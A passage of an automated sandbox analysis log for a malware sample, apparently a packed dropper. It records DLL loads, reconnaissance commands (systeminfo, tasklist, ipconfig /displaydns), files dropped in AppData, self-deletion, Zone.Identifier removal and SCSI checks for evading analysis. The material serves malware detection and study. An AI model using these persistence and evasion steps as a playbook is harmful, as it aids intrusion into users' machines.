                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                  Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\v173TV3V11.exeUnpacked PE file: 0.2.v173TV3V11.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ruyohel:W;.tls:W;.rihogi:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhUnpacked PE file: 5.2.bsjhhuh.400000.0.unpack .text:ER;.rdata:R;.data:W;.ruyohel:W;.tls:W;.rihogi:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeUnpacked PE file: 6.2.C35.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.sazabah:W;.tls:W;.kisuva:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AF78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,9_2_00007FF763AF78EC
                  Source: v173TV3V11.exeStatic PE information: section name: .ruyohel
                  Source: v173TV3V11.exeStatic PE information: section name: .rihogi
                  Source: C35.exe.1.drStatic PE information: section name: .sazabah
                  Source: C35.exe.1.drStatic PE information: section name: .kisuva
                  Source: vejhhuh.1.drStatic PE information: section name: .sazabah
                  Source: vejhhuh.1.drStatic PE information: section name: .kisuva
                  Source: bsjhhuh.1.drStatic PE information: section name: .ruyohel
                  Source: bsjhhuh.1.drStatic PE information: section name: .rihogi
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_006B1540 pushad ; ret 0_2_006B1550
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_009135D2 push B63524ADh; retn 001Fh0_2_00913609
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_009140CF pushfd ; iretd 0_2_009140D0
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_0091522F push esp; ret 0_2_00915231
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_004031DB push eax; ret 5_2_004032AB
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_006C1540 pushad ; ret 5_2_006C1550
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_006F4617 push esp; ret 5_2_006F4619
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_006F29BA push B63524ADh; retn 001Fh5_2_006F29F1
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_006F34B7 pushfd ; iretd 5_2_006F34B8
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_0040100B push esi; ret 6_2_0040100C
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_0040280E push esp; ret 6_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_0040281F push esp; ret 6_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_00402822 push esp; ret 6_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_00401328 push edi; retf 6_2_0040132A
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004027ED push esp; ret 6_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004027FB push esp; ret 6_2_004029C6
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_006B2862 push esp; ret 6_2_006B2A2D
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_006B1072 push esi; ret 6_2_006B1073
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_006B2875 push esp; ret 6_2_006B2A2D
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_006B2854 push esp; ret 6_2_006B2A2D
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_006B1909 push esp; iretd 6_2_006B19BF
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_006B2889 push esp; ret 6_2_006B2A2D
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_006B1386 push edi; retf 6_2_006B1391
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_006B2886 push esp; ret 6_2_006B2A2D
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_008B2195 push esi; ret 6_2_008B2196
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_008B24AC push edi; retf 6_2_008B24AD
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_008B3C1A push 9A832F1Fh; iretd 6_2_008B3C20
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_0040100B push esi; ret 8_2_0040100C
                  Source: v173TV3V11.exeStatic PE information: section name: .text entropy: 7.463605198956065
                  Source: C35.exe.1.drStatic PE information: section name: .text entropy: 7.46113197945979
                  Source: vejhhuh.1.drStatic PE information: section name: .text entropy: 7.46113197945979
                  Source: bsjhhuh.1.drStatic PE information: section name: .text entropy: 7.463605198956065

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vejhhuhJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\451E.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C35.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bsjhhuhJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vejhhuhJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bsjhhuhJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\v173tv3v11.exeJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\bsjhhuh:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vejhhuh:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\v173TV3V11.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
